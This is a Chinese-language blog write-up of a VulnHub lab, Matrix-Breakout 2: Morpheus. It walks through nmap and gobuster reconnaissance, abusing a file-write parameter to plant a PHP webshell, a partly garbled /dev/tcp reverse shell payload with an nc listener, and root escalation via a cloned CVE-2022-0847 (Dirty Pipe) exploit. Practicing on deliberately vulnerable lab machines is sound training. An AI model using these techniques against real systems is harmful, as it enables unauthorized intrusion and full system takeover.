记一次靶场渗透ATRIX-BREAKOUT


记一次靶场渗透 MATRIX-BREAKOUT: 2 MORPHEUS

靶场镜像下载地址: https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

靶场搭建

1.下载镜像

2.在VM里打开镜像

信息收集

kali 输入 arp-scan -l 判断靶机ip

image-20230406230134894

排除已知的 剩下的就是目标靶机ip 我这里是 192.168.136.137

然后去浏览器访问地址

image-20230406230145389

成功

然后nmap扫一下端口看 21 22 80 这些端口是否开放

nmap -sC -A -sV 192.168.136.137

image-20230406230154777

发现 22 80 81 开放尝试去浏览器访问

访问80没用 访问81需要登入

image-20230406230216522

没有啥有用的 继续进行目录遍历

gobuster dir -u http://192.168.136.137/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php txt

image-20230406230354380

访问 graffiti.php

image-20230406230347935

抓包

image-20230406230539110

发现file 访问file下的地址发现可以 访问 并且post的数据会在该页面下显示

所以我智力直接上传一句话木马 到shell.php

访问shell.php

image-20230406230439775

空白页面说明上传成功

image-20230406230632032

蚁剑链接

image-20230406230636554

这时候发现 蚁剑里显示的文件很少 应该是权限不够被隐藏掉了

这时候利用刚才的方式 直接上传反弹shell

message=& /dev/tcp/ip/端口 0>&1'"); ?> file =wolaile.php

这里注意要把反弹shell一句话进行url编码 或者你先在页面post抓包改file

这时候去kali开启端口监听

nc- vnlp 6666

image-20230406230646502

再去访问wolaile.php

image-20230406230654320

监听成功

image-20230406230704393

提权

接下来就是提权拿下root用户

我先看下各个目录看有没有可以用的没发现 啥 发现一张图片

image-20230406231113636

后面我是上网搜的 漏洞

系统是Linux4.x|5.x 发现有漏洞能直接用CVE-2022-0847

https://gitcode.net/mirrors/r1is/CVE-2022-0847漏洞下载地址

直接 git clone https://gitcode.net/mirrors/r1is/CVE-2022-0847

image-20230406230715320

克隆后 ls

进入到漏洞目录里

然后 chmod +x dirty.sh

给权限 直接运行

image-20230406231129165

恢复原来的密码可以直接获得root权限

进入 /root 目录

拿到flag

后来我改掉密码


登入 那个虚拟机 cd ../../../ 到根目录 发现还有几个flag 被我忽略了

image-20230406231210879

这里有一个是在我之前发现的图片中 大概是misc 图片隐写 图片隐写没太学 所以就没有继续去做了

image-20230406230816584

总结

有兴趣的可以去下载这个靶机做一下 这个靶机还挺有意思 比做CTF有意思多了


Author: F9F
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source F9F !
  TOC